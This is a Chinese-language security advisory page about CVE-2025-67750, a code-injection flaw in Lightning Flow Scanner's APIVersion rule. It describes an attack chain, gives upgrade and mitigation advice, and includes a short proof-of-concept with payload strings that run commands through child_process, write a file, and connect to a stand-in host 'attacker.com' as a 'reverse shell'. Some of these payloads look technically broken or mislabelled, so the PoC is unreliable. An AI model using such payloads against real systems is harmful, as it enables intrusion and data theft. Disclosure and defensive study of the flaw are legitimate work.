CVE-2025-67750 CVSS 8.4 高危

Lightning Flow Scanner 远程代码执行漏洞 (CVE-2025-67750)

披露日期: 2025-12-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67750

漏洞类型

远程代码执行

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Lightning Flow Scanner (Salesforce流程扫描工具)

漏洞概述

Lightning Flow Scanner是一款用于分析和优化Salesforce流程的CLI插件、VS Code扩展和GitHub Action工具。该工具在6.10.5及以下版本中存在严重的远程代码执行漏洞。漏洞根源在于APIVersion规则使用JavaScript的new Function()方法来评估表达式字符串，攻击者可以通过在规则配置或恶意构造的Flow元数据文件中注入恶意表达式来执行任意JavaScript代码。由于该工具通常在开发者机器、CI/CD运行环境和编辑器环境中运行，漏洞一旦被利用，攻击者可以完全控制受害者的系统环境，窃取敏感信息、植入后门或进行其他恶意操作。该漏洞无需认证和用户交互即可触发，攻击复杂度较低，具有较高的安全风险。建议用户立即升级到6.10.6或更高版本以修复此安全问题。

技术细节

漏洞的核心问题在于Lightning Flow Scanner的APIVersion规则实现中，使用了new Function()构造函数来动态评估表达式字符串。new Function()会将其参数作为JavaScript代码在全局作用域执行，这使得攻击者可以通过构造特定的表达式来执行任意代码。攻击者只需要创建一个包含恶意JavaScript表达式的Flow元数据文件，当工具扫描该文件时，恶意代码就会在受害者的机器上执行。由于该工具被集成到多种开发环境中（包括CLI、VS Code扩展和GitHub Action），攻击面广泛。CVSS评分8.4（高危）反映了该漏洞的高影响性和低攻击复杂度。漏洞已在6.10.6版本中通过移除不安全的new Function()调用并使用安全的表达式解析方式得到修复。

攻击链分析

STEP 1

步骤1

攻击者创建恶意Flow元数据文件，在apiVersion字段中注入JavaScript恶意代码

STEP 2

步骤2

受害者使用存在漏洞的Lightning Flow Scanner（<=6.10.5）扫描该恶意文件

STEP 3

步骤3

APIVersion规则使用new Function()评估表达式字符串，触发恶意JavaScript代码执行

STEP 4

步骤4

攻击者获得受害者系统的代码执行权限，可执行任意命令、窃取数据或植入后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
CVE-2025-67750 PoC - Malicious Flow Metadata File
This PoC demonstrates arbitrary JavaScript execution via APIVersion rule
in Lightning Flow Scanner <= 6.10.5
*/

// Create a malicious flow metadata file with embedded JavaScript payload
const maliciousFlowMetadata = {
  Flow: {
    '@': {
      xmlns: 'http://soap.sforce.com/2006/04/metadata',
      apiVersion: '58.0'
    },
    description: 'Malicious flow metadata',
    // The APIVersion rule evaluates this expression using new Function()
    // Attacker can inject arbitrary JavaScript here
    apiVersion: '${require("child_process").execSync("whoami")}'
  }
};

// Example: Exfiltrate environment variables
const exfilPayload = '${require("child_process").execSync("echo $PATH")}';

// Example: Write arbitrary file
const fileWritePayload = '${require("fs").writeFileSync("/tmp/pwned","hacked")}';

// Example: Reverse shell payload
const reverseShellPayload = '${require("net").createConnection(4444,"attacker.com")}';

console.log('PoC for CVE-2025-67750');
console.log('Generate malicious flow XML file and scan with vulnerable version');
console.log('Payload:', exfilPayload);

影响范围

Lightning Flow Scanner < 6.10.6

防御指南

临时缓解措施

立即将Lightning Flow Scanner升级到6.10.6版本。临时缓解措施包括：避免使用该工具扫描来自不受信任来源的Flow元数据文件；在CI/CD管道中限制工具的网络和文件系统访问权限；使用容器化环境隔离扫描操作以限制潜在损害范围。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表